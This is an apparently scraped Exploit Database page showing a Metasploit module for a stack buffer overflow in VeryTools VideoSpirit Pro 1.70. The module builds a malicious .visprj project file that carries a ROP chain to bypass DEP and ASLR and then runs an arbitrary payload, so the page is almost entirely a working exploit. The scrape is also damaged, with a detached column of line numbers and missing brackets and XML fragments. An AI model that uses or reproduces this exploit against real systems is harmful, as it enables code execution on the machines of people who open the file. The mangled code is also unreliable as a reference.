VeryTools VideoSpirit Pro 1.70 – ‘.visprj’ Local Buffer Overflow (Metasploit)

Exploit Database
112 阅读

作者： Metasploit

日期： 2011-04-11
类别：
- local
平台：
- windows
来源：https://www.exploit-db.com/exploits/17153/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

136

137

138

139

140

141

142

143

144

145

146

147

148

149

150

151

152

153

154

155

156

157

158

159

160

161

162

163

164

165

166

167

168

169

170

171

172

173

174

175

176

177

178

179

180

181

182

183

184

185

186

187

188

189

190

191

192

193

194

195

196

197

198

199

200

201

202

203

204

205

206

207

208

209

210

211

212

213

214

215

216

217

218

219

220

221

222

223

224

225

226

227

228

229

230

231

232

233

234

235

236

237

238

239

240

241

242

243

244

245

246

247

248

# $Id: videospirit_visprj.rb 12305 2011-04-11 23:32:41Z sinn3r $

# This file is part of the Metasploit Framework and may be subject to

# redistribution and commercial restrictions. Please see the Metasploit

# Framework web site for more information on licensing and terms of use.

# http://metasploit.com/framework/

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::FILEFORMAT

def initialize(info = {})

super(update_info(info,

'Name' => 'VeryTools Video Spirit Pro <= 1.70',

'Description'=> %q{

This module exploits a stack buffer overflow in Video Spirit <= 1.70.

When opening a malicious project file (.visprj), a stack buffer overflow occurs,

resulting in arbitrary code execution.

This exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.

'License'=> MSF_LICENSE,

'Author' =>

[

'Acidgen',#found the vulnerability

'corelanc0d3r', #rop exploit + msf module

'Version'=> '$Revision: 12305 $',

'References' =>

[

[ 'URL', 'http://www.corelan.be/advisories.php?id=CORELAN-11-001' ],

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'Payload'=>

{

'Space'=> 800,#0x320 bytes - avoid marking wrong page as RWX

'BadChars' => "\x00\x0a\x0b\x0c\x0d\x0e\x0f\x1a\x1b\x1c\x1d\x1e\x1f\x21\x22\x26\x27\x2f\x3c\x3e",

'DisableNops'=> 'True',

'Platform' => 'win',

'Targets'=>

[

[ 'Windows XP/Vista/Win7/... Generic DEP & ASLR Bypass',

{

'OffSet'=> 168,

'OffSetToRop' => 952,

'Ret' => 0x1006CC10, #overlayplug.dll stackpivot bad char friendly

}

'Privileged' => false,

'DisclosureDate' => 'Apr 11 2011',

'DefaultTarget'=> 0))

register_options(

[

OptString.new('FILENAME', [ true, 'VideoSpirit project name.','msf.visprj']),

], self.class)

end

def junk

return rand_text_alphanumeric(4).unpack("L")[0].to_i

end

def exploit

print_status("Creating '#{datastore['FILENAME']}' file ...")

header = %Q|

<track>

</track>

footer = %Q|

</type0>

</type1>

</output>

print_status("Preparing payload")

pivot = [target.ret].pack('V')

rop_gadgets =

[

# one non-ASLR module is enough for generic ASLR & DEP bypass !

# pvefindaddr rop 'n roll

# First, grab VirtualProtect ptr

0x10065292,# POP EAX # RETN[OverlayPlug.dll]

0x106F4244,# IAT entry + offsqet (bad char friendly)

0x10019762,# POP EBP # RETN[OverlayPlug.dll]

0xEFEFEFF0,# bye bye offset

0x10084977,# ADD EBP,EAX # RETN[OverlayPlug.dll]

0x100684B8,# MOV EAX,EBP # POP ESI # POP EBP # POP EBX # RETN[OverlayPlug.dll]

junk,

0x1005E114,# MOV EAX,DWORD PTR DS:[EAX] # RETN[OverlayPlug.dll]

0x10016A56,# XCHG EAX,ESI [OverlayPlug.dll]

# set size

0x100A9274,# POP EAX # RETN [OverlayPlug.dll]

0x10101330,# 0x320 bytes - change this if needed, but don't make it too big :)

0x10019762,# POP EBP # RETN [OverlayPlug.dll]

0xEFEFEFF0,# boo

0x10084977,# ADD EBP,EAX # RETN [OverlayPlug.dll]

0x10053E4C,# XCHG EAX,EBP # RETN[OverlayPlug.dll]

0x10066D8C,# PUSH EAX # ADD AL,5D # POP EBX # MOV DWORD PTR FS:[0],ECX # ADD ESP,50 # RETN 10[OverlayPlug.dll]

junk,

# set NewProtect to 0x40

0x100E3D4A,# XOR EAX,EAX # XOR EDX,EDX # RETN[OverlayPlug.dll]

junk,

0x10010C36,# ADD EAX,10 # POP EBP # RETN 4[OverlayPlug.dll]

junk,

0x10010C36,# ADD EAX,10 # POP EBP # RETN 4[OverlayPlug.dll]

junk,

0x10010C36,# ADD EAX,10 # POP EBP # RETN 4[OverlayPlug.dll]

junk,

0x10010C36,# ADD EAX,10 # POP EBP # RETN 4[OverlayPlug.dll]

junk,

0x10030C8B,# ADD DL,AL # ADD AL,0 # MOV EAX,EDX # RETN 4[OverlayPlug.dll]

junk,

# write pOldProtect to .data section

0x1001AB51,# POP ECX # RETN[OverlayPlug.dll]

junk,

0x10117030,# RW

# EDI : ROP NOP

0x10057090,# POP EDI # RETN[OverlayPlug.dll]

0x10057091,# ROP NOP

# pReturn2Payload

0x100BC8E8,# PUSH ESP # MOV EAX,ESI # POP ESI # RETN[OverlayPlug.dll]

0x10016A56,# XCHG EAX,ESI # RETN[OverlayPlug.dll]

0x1003C946,# ADD EAX,0A # RETN[OverlayPlug.dll]

0x1003C946,

0x1001FDBD,# XCHG EAX,EBP # RETN[OverlayPlug.dll]

0x100A9274,# POP EAX # RETN [OverlayPlug.dll]

0x41414141,

# go

0x10066F84,# PUSHAD # RETN[OverlayPlug.dll]

].pack("V*")

buffer = "<valitem name="

buffer << '"'

buffer << rand_text_alphanumeric((target['OffSet']))

buffer << rand_text_alphanumeric(4) #nseh

buffer << pivot

buffer << rand_text_alphanumeric((target['OffSetToRop']))

buffer << "\x91\x70\x05\x10" * 10 #rop nop, offset Win7

buffer << rop_gadgets

buffer << make_nops(150)

buffer << payload.encoded

buffer << rand_text_alphanumeric(4000)

buffer << '"'

buffer << ' value="msmpeg4v2"'

buffer << "/>"

buffer << "\n"

filecontent = header + buffer + footer

print_status("Writing payload to file")

file_create(filecontent)

end